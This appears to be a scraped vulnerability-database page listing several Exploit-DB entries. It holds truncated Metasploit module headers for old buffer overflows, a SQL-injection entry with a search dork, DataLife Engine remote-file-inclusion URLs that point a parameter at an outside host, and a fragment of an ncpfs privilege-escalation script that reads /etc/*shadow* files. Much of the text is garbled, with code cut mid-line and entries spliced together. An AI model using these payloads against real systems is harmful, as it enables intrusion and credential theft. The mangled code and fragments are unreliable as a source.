This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
Since the driver runs in the kernel space, a failed exploit attempt can
cause the OS to reboot.
},
'Author' =>
[
'toto',
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[
Exploit-DB
Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0491 Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)
Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)
---
##
# $Id: type77.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
'Description' => %q{
This module exploits a stack buffer overflow in the Arkeia backup
client for the Mac OS X platform. This vulnerability affects
all versions up to and including 5.3.3 and has been tested
with Arkeia 5.3.1 on Mac OS X 10.3.5.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revisi
Exploit-DB
Sentinel LM - UDP Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0353 Sentinel LM - UDP Buffer Overflow (Metasploit)
Sentinel LM - UDP Buffer Overflow (Metasploit)
---
##
# $Id: sentinel_lm7_udp.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SentinelLM UDP Buffer Overflow',
'Description' => %q{
This module exploits a simple stack buffer overflow in the Sentinel
License Manager. The SentinelLM service is installed with a
wide selection of products and seems particular popular with
academic products. If the wrong target value is selected,
the service will crash and not restart.
},
'Author' => [ 'hdm' ],
'License' => MSF
Exploit-DB
MaxDB WebDBM - GET Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0684 MaxDB WebDBM - GET Buffer Overflow (Metasploit)
MaxDB WebDBM - GET Buffer Overflow (Metasploit)
---
##
# $Id: maxdb_webdbm_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MaxDB WebDBM GET Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the MaxDB WebDBM
service. This service is included with many recent versions
of the MaxDB and SAPDB products. This particular module is
capable of exploiting Windows systems through the use of an
SEH frame overwrite. The offset to the SEH frame may change
depending on
Exploit-DB
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0043 Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
---
##
# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Apple ITunes 4.7 Playlist Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Apple ITunes 4.7
build 4.7.0.42. By creating a URL link to a malicious PLS
file, a remote attacker could overflow a buffer and execute
arbitrary code. When using this module, be sure to set the
URIPATH with an extension of '.pls'.
},
'License' => MSF_LICE
Exploit-DB
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)
exploitdb·2010-05-09
CVE-2005-1213 Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)
---
##
# $Id: ms05_030_nntp.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'Microsoft Outlook Express NNTP Response Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the news reader of Microsoft
Outlook Express.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2005-1213' ],
[ 'OSVDB', '17306' ],
[ 'BID', '13951' ],
[ 'MSB', 'MS05-03
Exploit-DB
Barracuda - IMG.pl Remote Command Execution (Metasploit)
exploitdb·2010-04-30
CVE-2005-2847 Barracuda - IMG.pl Remote Command Execution (Metasploit)
Barracuda - IMG.pl Remote Command Execution (Metasploit)
---
##
# $Id: barracuda_img_exec.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Barracuda IMG.PL Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.
},
'Author' => [ 'Nicolas Gregoire ', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
['CVE', '2005-2847'],
['OSVDB',
Exploit-DB
CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2005-3190 CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
---
##
# $Id: ca_igateway_debug.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'CA iTechnology iGateway Debug Mode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Computer Associates
iTechnology iGateway component. When True is enabled
in igateway.conf (non-default), it is possible to overwrite the stack
and execute code remotely. This module works best with Ordinal payloads.
},
'Author' => 'patrick',
'License' => MSF_LICENS
Exploit-DB
SoftBizScripts Hosting Script - SQL Injection
exploitdb·2010-04-28
CVE-2005-3817 SoftBizScripts Hosting Script - SQL Injection
SoftBizScripts Hosting Script - SQL Injection
---
# Exploit Title: SoftBizScripts Hosting Script SQL Injection Vunerability
# Date: 29-4-2010
# Author: 41.w4r10r
# Vendor Link : http://softbizscripts.com/
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork : inurl:"browsecats.php?cid="
# Code :
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Harin,Jappy,Dark_Blue,sid3^3f3c7
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
Exploited Link :
http://[site]m/browsecats.php?cid=2'
example :
http
Exploit-DB
DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com
Exploit-DB
DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion
DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com
Exploit-DB
DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com
Exploit-DB
DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
exploitdb·2010-01-19
CVE-2010-2005 DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/37851/info
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Datalife Engine 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com
Exploit-DB
ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation
exploitdb·2005-01-30
CVE-2010-0788 ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation
ncpfs /dev/null
(echo $1
ncpmount $MNTDIR
echo)
(rmdir $MNTDIR
rm ~/.nwclient
mv .nwclient.temp .nwclient)2>/dev/null)}
(for i in /etc/*shadow*
do head1 $i
done)))#
# milw0rm.com [2005-01-30]
No writeups or analysis indexed.
http://www.packetstormsecurity.com/1001-exploits/datalifeengine83-rfi.txthttp://www.securityfocus.com/bid/37851https://exchange.xforce.ibmcloud.com/vulnerabilities/55757http://www.packetstormsecurity.com/1001-exploits/datalifeengine83-rfi.txthttp://www.securityfocus.com/bid/37851https://exchange.xforce.ibmcloud.com/vulnerabilities/55757
2010-05-20
Published